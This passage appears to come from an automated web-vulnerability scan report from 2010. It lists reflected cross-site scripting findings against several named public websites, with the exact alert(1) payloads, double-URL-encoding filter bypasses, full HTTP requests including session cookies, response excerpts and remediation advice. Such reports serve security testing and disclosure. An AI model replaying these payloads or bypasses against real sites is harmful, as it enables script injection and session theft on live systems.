Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /web?q=What+causes+brain+freeze%3F41f84\'%3ba552257ac42&gc=1&qsrc=3045&o=0&l=dir HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
The value of the qid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 558cb'%3balert(1)//ec1d53be65e was submitted in the qid parameter. This input was echoed as 558cb';alert(1)//ec1d53be65e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /web?q=los+angeles+it+consulting&qsrc=0&frstpgo=0&o=0&l=dir&qid=38FDBEE5438F532FB16A69B271896D79558cb'%3balert(1)//ec1d53be65e&page=2&jss= HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>Ask.com - What's Yo ...[SNIP]... <script type="text/javascript"> var _psBack = '« Prev'; var _psForward = 'Next »'; var _psQueryID = '38FDBEE5438F532FB16A69B271896D79558cb';alert(1)//ec1d53be65e'; var _psQuerySource = '0'; var _psSiteID = ''; </script> ...[SNIP]...
2.144. http://www.avalanchepub.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.avalanchepub.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f00b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d02eb00d6bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f00b'style='x:expression(alert(1))'d02eb00d6bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /?2f00b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d02eb00d6bf=1 HTTP/1.1 Host: www.avalanchepub.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 976ff"><script>alert(1)</script>da45883e2da was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/testimonial.php?id=dtb976ff"><script>alert(1)</script>da45883e2da HTTP/1.1 Host: www.dcgla.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=245246864.1290271625.1.1.utmcsr=ask|utmccn=(organic)|utmcmd=organic|utmctr=los%20angeles%20it%20consulting; ClickAndChat.com=109-1290271668886; __utma=245246864.1301270426.1290271625.1290271625.1290271625.1; __utmc=245246864; __utmb=245246864.4.10.1290271625;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 Content-type: text/html
2.146. http://www.dcgla.com/includes/testimonial.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dcgla.com
Path:
/includes/testimonial.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e32d"><script>alert(1)</script>8b1a40d7583 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 Content-type: text/html
2.147. http://www.directpointe.com/support/esupport_login.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.directpointe.com
Path:
/support/esupport_login.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc6ba"><script>alert(1)</script>9eb03b16144 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /support/esupport_login.aspx?dc6ba"><script>alert(1)</script>9eb03b16144=1 HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 25395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input type="hidden" name="errorURL" value="http://www.directpointe.com/support/esupport_login.aspx?dc6ba"><script>alert(1)</script>9eb03b16144=1" /> ...[SNIP]...
2.148. http://www.lang.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lang.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ec76c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279dd576fad79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec76c'style='x:expression(alert(1))'9dd576fad79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /?ec76c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279dd576fad79=1 HTTP/1.1 Host: www.lang.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.149. http://www.makeitwork.com/about/press-releases [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.makeitwork.com
Path:
/about/press-releases
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4d65%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3048996d15f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4d65"><script>alert(1)</script>3048996d15f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /about/press-releases?f4d65%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3048996d15f=1 HTTP/1.1 Host: www.makeitwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 17:20:01 GMT Server: Apache X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 20 Nov 2010 17:20:01 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 41979
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f614c%2527%253balert%25281%2529%252f%252fc73f4c1f2ed was submitted in the REST URL parameter 3. This input was echoed as f614c';alert(1)//c73f4c1f2ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /plugins/system/rokboxf614c%2527%253balert%25281%2529%252f%252fc73f4c1f2ed/ HTTP/1.1 Host: www.makeitwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 17:20:13 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 62493
if('Rokboxf614c';Alert(1)//C73f4c1f2ed') { var pattern = /Rokboxf614c';Alert(1)//C73f4c1f2ed/i; $(".services_header").filter(function(){ var string = $(this).text(); var found = pattern.test(string); if(found) { $("d ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a42c5%253balert%25281%2529%252f%252fa87db967c5e was submitted in the REST URL parameter 3. This input was echoed as a42c5;alert(1)//a87db967c5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /plugins/system/rokboxa42c5%253balert%25281%2529%252f%252fa87db967c5e/ HTTP/1.1 Host: www.makeitwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 17:20:15 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 62664
if('Rokboxa42c5;Alert(1)//A87db967c5e') { var pattern = /Rokboxa42c5;Alert(1)//A87db967c5e/i; $(".services_header").filter(function(){ var string = $(this).text(); var found = pattern.test(string); if(found) { $("div[id^=m_], div[id^=s_]").css('display', 'none'); re ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload d26ef%253c%252ftitle%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ed4c62d3506a was submitted in the REST URL parameter 3. This input was echoed as d26ef</title><img src=a onerror=alert(1)>d4c62d3506a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /plugins/system/rokboxd26ef%253c%252ftitle%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ed4c62d3506a/ HTTP/1.1 Host: www.makeitwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 17:20:35 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 62636
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <he ...[SNIP]... <title>Rokboxd26ef</Title><Img Src=A Onerror=Alert(1)>D4c62d3506a System, PLUGINS. Make It Work guarantees you will be delighted!</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 708b3"><img%20src%3da%20onerror%3dalert(1)>59fe09ce6a was submitted in the REST URL parameter 3. This input was echoed as 708b3"><img src=a onerror=alert(1)>59fe09ce6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /plugins/system/rokbox708b3"><img%20src%3da%20onerror%3dalert(1)>59fe09ce6a/ HTTP/1.1 Host: www.makeitwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 17:20:11 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 62683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <he ...[SNIP]... <meta name="keywords" content="Make It Work provides the best Rokbox708b3"><Img Src=A Onerror=Alert(1)>59fe09ce6a services in System, PLUGINS. We guarantee you will be delighted! Call 877-625-3489." /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 93329<img%20src%3da%20onerror%3dalert(1)>230708c6484 was submitted in the REST URL parameter 3. This input was echoed as 93329<img src=a onerror=alert(1)>230708c6484 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /plugins/system/rokbox93329<img%20src%3da%20onerror%3dalert(1)>230708c6484/ HTTP/1.1 Host: www.makeitwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 17:20:23 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 62454
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <he ...[SNIP]... <h1 class="title">Rokbox93329<Img Src=A Onerror=Alert(1)>230708c6484 Services in System, PLUGINS:</h1> ...[SNIP]...
The value of the country request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28087</script><script>alert(1)</script>e99a017790b was submitted in the country parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /maps/map.adp?searchtype=address&country=28087</script><script>alert(1)</script>e99a017790b HTTP/1.1 Host: www.mapquest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c ...[SNIP]... tegories":null,"charFilter":null,"displayQuery":null,"inflectionPointIndex":null,"latch":false,"latchQuery":null,"locale":"en","mapState":null,"mostPopularCategory":null,"page":0,"position":0,"query":"28087</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>E99A017790B","routeContext":null,"routeSessionId":null,"searchAroundLocation":null,"searchTerm":null,"searchType":"onMap","shapePoints":null,"showDetails":false,"sortType":"relevance","total":0},"name":null,"note ...[SNIP]...
2.156. http://www.turnerlicensing.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 616be%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527018d474a113 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 616be'style='x:expression(alert(1))'018d474a113 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
2.157. http://www.turnerlicensing.com/11x17_recordable_message_centers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/11x17_recordable_message_centers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75fdb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527768256e6a68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75fdb'style='x:expression(alert(1))'768256e6a68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /11x17_recordable_message_centers?75fdb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527768256e6a68=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.158. http://www.turnerlicensing.com/11x17_sound_message_centers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/11x17_sound_message_centers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cc6b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eea3ebc05ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4cc6b'style='x:expression(alert(1))'eea3ebc05ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /11x17_sound_message_centers?4cc6b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eea3ebc05ed=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.159. http://www.turnerlicensing.com/2_year_planners [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/2_year_planners
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 59479%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527789fbd98f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59479'style='x:expression(alert(1))'789fbd98f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /2_year_planners?59479%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527789fbd98f9=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.160. http://www.turnerlicensing.com/3_ring_binders [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/3_ring_binders
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 83686%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731528bb40bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 83686'style='x:expression(alert(1))'31528bb40bd in the application's response.
